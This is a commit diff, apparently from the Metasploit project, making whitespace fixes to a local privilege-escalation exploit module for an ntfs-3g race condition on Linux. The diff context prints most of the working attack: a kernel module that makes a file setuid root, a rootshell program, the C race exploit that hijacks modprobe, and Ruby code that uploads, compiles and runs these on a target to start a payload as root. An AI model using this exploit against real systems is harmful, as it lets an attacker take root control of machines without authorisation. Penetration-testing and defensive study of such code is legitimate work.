forgot add fixes for travis
parent
a8609f5c66
commit
0c353841ab
|
@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
|
|
||||||
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
||||||
def headers_installed?()
|
def headers_installed?()
|
||||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||||
if output
|
if output
|
||||||
if output.include?('linux-headers')
|
if output.include?('linux-headers')
|
||||||
return true
|
return true
|
||||||
|
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
CheckCode::Appears
|
CheckCode::Appears
|
||||||
else
|
else
|
||||||
print_error("Version installed not vulnerable: #{output}")
|
print_error("Version installed not vulnerable: #{output}")
|
||||||
CheckCode::Safe
|
CheckCode::Safe
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_error('ntfs-3g not installed')
|
print_error('ntfs-3g not installed')
|
||||||
|
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <linux/cred.h>
|
#include <linux/cred.h>
|
||||||
#include <linux/syscalls.h>
|
#include <linux/syscalls.h>
|
||||||
#include <linux/kallsyms.h>
|
#include <linux/kallsyms.h>
|
||||||
|
|
||||||
static int suidfile_fd = -1;
|
static int suidfile_fd = -1;
|
||||||
module_param(suidfile_fd, int, 0);
|
module_param(suidfile_fd, int, 0);
|
||||||
|
|
||||||
static int __init init_rootmod(void) {
|
static int __init init_rootmod(void) {
|
||||||
int (*sys_fchown_)(int fd, int uid, int gid);
|
int (*sys_fchown_)(int fd, int uid, int gid);
|
||||||
int (*sys_fchmod_)(int fd, int mode);
|
int (*sys_fchmod_)(int fd, int mode);
|
||||||
const struct cred *kcred, *oldcred;
|
const struct cred *kcred, *oldcred;
|
||||||
|
|
||||||
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
||||||
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
||||||
|
|
||||||
printk(KERN_INFO "rootmod loading\n");
|
printk(KERN_INFO "rootmod loading\n");
|
||||||
kcred = prepare_kernel_cred(NULL);
|
kcred = prepare_kernel_cred(NULL);
|
||||||
oldcred = override_creds(kcred);
|
oldcred = override_creds(kcred);
|
||||||
|
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
revert_creds(oldcred);
|
revert_creds(oldcred);
|
||||||
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
||||||
}
|
}
|
||||||
|
|
||||||
static void __exit cleanup_rootmod(void) {}
|
static void __exit cleanup_rootmod(void) {}
|
||||||
|
|
||||||
module_init(init_rootmod);
|
module_init(init_rootmod);
|
||||||
module_exit(cleanup_rootmod);
|
module_exit(cleanup_rootmod);
|
||||||
|
|
||||||
MODULE_LICENSE("GPL v2");
|
MODULE_LICENSE("GPL v2");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <err.h>
|
#include <err.h>
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <sys/types.h>
|
#include <sys/types.h>
|
||||||
|
|
||||||
int main(void) {
|
int main(void) {
|
||||||
if (setuid(0) || setgid(0))
|
if (setuid(0) || setgid(0))
|
||||||
err(1, "setuid/setgid");
|
err(1, "setuid/setgid");
|
||||||
|
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <sys/wait.h>
|
#include <sys/wait.h>
|
||||||
#include <time.h>
|
#include <time.h>
|
||||||
#include <sys/utsname.h>
|
#include <sys/utsname.h>
|
||||||
|
|
||||||
int main(void) {
|
int main(void) {
|
||||||
/* prevent shell from backgrounding ntfs-3g when stopped */
|
/* prevent shell from backgrounding ntfs-3g when stopped */
|
||||||
pid_t initial_fork_child = fork();
|
pid_t initial_fork_child = fork();
|
||||||
|
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
execl("rootshell", "rootshell", NULL);
|
execl("rootshell", "rootshell", NULL);
|
||||||
exit(0);
|
exit(0);
|
||||||
}
|
}
|
||||||
|
|
||||||
char buf[1000] = {0};
|
char buf[1000] = {0};
|
||||||
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
||||||
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
||||||
|
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
template, template);
|
template, template);
|
||||||
if (system(system_cmd))
|
if (system(system_cmd))
|
||||||
errx(1, "shell command failed");
|
errx(1, "shell command failed");
|
||||||
|
|
||||||
// Set up inotify watch for /proc/mounts.
|
// Set up inotify watch for /proc/mounts.
|
||||||
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
||||||
// the watch will only see accesses by this process.
|
// the watch will only see accesses by this process.
|
||||||
|
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /proc/mounts");
|
err(1, "unable to watch /proc/mounts");
|
||||||
|
|
||||||
// Set up inotify watch for /proc/filesystems.
|
// Set up inotify watch for /proc/filesystems.
|
||||||
// This can be used to detect whether we lost the race.
|
// This can be used to detect whether we lost the race.
|
||||||
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||||
|
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /proc/filesystems");
|
err(1, "unable to watch /proc/filesystems");
|
||||||
|
|
||||||
// Set up inotify watch for /sbin/modprobe.
|
// Set up inotify watch for /sbin/modprobe.
|
||||||
// This can be used to detect when we can release all our open files.
|
// This can be used to detect when we can release all our open files.
|
||||||
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||||
|
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /sbin/modprobe");
|
err(1, "unable to watch /sbin/modprobe");
|
||||||
|
|
||||||
int do_exec_pipe[2];
|
int do_exec_pipe[2];
|
||||||
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
||||||
err(1, "pipe");
|
err(1, "pipe");
|
||||||
|
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
||||||
}
|
}
|
||||||
child = getpid();
|
child = getpid();
|
||||||
|
|
||||||
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
||||||
if (write(do_exec_pipe[1], buf, 1) != 1)
|
if (write(do_exec_pipe[1], buf, 1) != 1)
|
||||||
errx(1, "pipe write failed");
|
errx(1, "pipe write failed");
|
||||||
|
|
||||||
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
||||||
errx(1, "inotify read failed");
|
errx(1, "inotify read failed");
|
||||||
if (kill(getppid(), SIGSTOP))
|
if (kill(getppid(), SIGSTOP))
|
||||||
err(1, "can't stop setuid parent");
|
err(1, "can't stop setuid parent");
|
||||||
|
|
||||||
// Check whether we won the main race.
|
// Check whether we won the main race.
|
||||||
struct pollfd poll_fds[1] = {{
|
struct pollfd poll_fds[1] = {{
|
||||||
.fd = fs_inotify_fd,
|
.fd = fs_inotify_fd,
|
||||||
|
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
exit(1);
|
exit(1);
|
||||||
}
|
}
|
||||||
puts("looks like we won the race");
|
puts("looks like we won the race");
|
||||||
|
|
||||||
// Open as many files as possible. Whenever we have
|
// Open as many files as possible. Whenever we have
|
||||||
// a bunch of open files, move them into a new process.
|
// a bunch of open files, move them into a new process.
|
||||||
int total_open_files = 0;
|
int total_open_files = 0;
|
||||||
|
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if (reached_limit)
|
if (reached_limit)
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Wake up ntfs-3g and keep allocating files, then free up
|
// Wake up ntfs-3g and keep allocating files, then free up
|
||||||
// the files as soon as we're reasonably certain that either
|
// the files as soon as we're reasonably certain that either
|
||||||
// modprobe was spawned or the attack failed.
|
// modprobe was spawned or the attack failed.
|
||||||
if (kill(getppid(), SIGCONT))
|
if (kill(getppid(), SIGCONT))
|
||||||
err(1, "SIGCONT");
|
err(1, "SIGCONT");
|
||||||
|
|
||||||
time_t start_time = time(NULL);
|
time_t start_time = time(NULL);
|
||||||
while (1) {
|
while (1) {
|
||||||
for (int i=0; i<1000; i++) {
|
for (int i=0; i<1000; i++) {
|
||||||
|
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
||||||
print_status('Writing files to target')
|
print_status('Writing files to target')
|
||||||
cmd_exec("cd #{datastore['WritableDir']}")
|
cmd_exec("cd #{datastore['WritableDir']}")
|
||||||
|
|
||||||
#write all the files and compile. This is equivalent to the original compile.sh
|
#write all the files and compile. This is equivalent to the original compile.sh
|
||||||
#gcc -o rootshell rootshell.c -Wall
|
#gcc -o rootshell rootshell.c -Wall
|
||||||
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
||||||
|
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
||||||
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
||||||
cmd_exec('rm -rf depmod_tmp')
|
cmd_exec('rm -rf depmod_tmp')
|
||||||
|
|
||||||
register_file_for_cleanup("#{rootmod_path}.ko")
|
register_file_for_cleanup("#{rootmod_path}.ko")
|
||||||
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
||||||
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
||||||
|
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
output = cmd_exec(sploit_path)
|
output = cmd_exec(sploit_path)
|
||||||
unless session_created?
|
unless session_created?
|
||||||
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
||||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||||
vprint_error(output)
|
vprint_error(output)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue